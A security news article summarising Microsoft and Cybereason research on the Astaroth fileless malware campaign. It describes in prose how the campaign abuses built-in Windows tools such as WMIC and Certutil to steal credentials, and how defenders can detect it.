New Campaign Unveils Widespread Distribution of Astaroth Fileless Malware
In a new report from Microsoft, cybersecurity experts reveal the latest details of an extensive campaign involving the notorious Astaroth fileless malware. Initially targeting users in Europe and Brazil earlier this year, this malware has been operational since at least 2017 and is designed to extract sensitive information—including login credentials and keystrokes—without deploying any traditional executable files on the affected systems.
Astaroth, as identified by researchers from Cybereason in February, employs a technique known as “living off the land.” This method enables the malware to execute its payload directly in the memory of the targeted device or through legitimate system utilities such as WMIC, Certutil, Bitsadmin, and Regsvr32. By utilizing these trusted Windows components, Astaroth evades many endpoint security solutions that primarily analyze static files for threats.
The investigation into this threat began when Microsoft’s Andrea Lelli identified a significant increase in the use of the WMIC tool during a routine analysis of Windows telemetry data. This spike led to the uncovering of a multi-stage fileless attack initiated via spear-phishing emails. These emails contained a malicious link that redirected users to a website hosting a deceptive LNK shortcut file. When activated, this shortcut invokes the WMIC tool to download and execute JavaScript code, which in turn uses the Bitsadmin tool to retrieve additional malicious payloads.
These payloads are encoded in Base64 and subsequently decoded using the Certutil tool. Notably, the Regsvr32 utility loads one of the decoded Dynamic Link Libraries (DLLs), which acts to decrypt and load further files until the final payload of Astaroth is integrated into the Userinit process. This process underscores that Astaroth does not rely on exploiting vulnerabilities or traditional trojan tactics; it strictly utilizes inherent system tools, masking its activities as standard operational procedures.
As a result, the Astaroth malware can stealthily access the target system, stealing vital user information and transmitting it to a remote server controlled by the attackers. This data can be leveraged for lateral movement within networks or for financial fraud, significantly positioning the attackers in the cybercriminal ecosystem.
According to Microsoft, their Defender ATP solutions can detect fileless malware attacks at various stages of infection, providing a level of protection that traditional file-centric security measures do not offer. Lelli emphasized that “being fileless doesn’t mean being invisible; it certainly doesn’t mean being undetectable.” Hence, while Astaroth adopts advanced evasion tactics, it leaves behind a trail of forensic evidence that can be leveraged for future defensive measures.
For business owners and IT professionals, understanding the use of tactics outlined in the MITRE ATT&CK framework—such as initial access, command and control through legitimate system tools, and data exfiltration—is essential. This knowledge can enhance preventive strategies against such threats and improve overall cybersecurity posture.
To delve deeper into the intricacies of the Astaroth malware, readers are encouraged to access the detailed analysis published on Cybereason’s blog, which sheds light on its operational complexities and the evolving threat landscape that businesses face today.
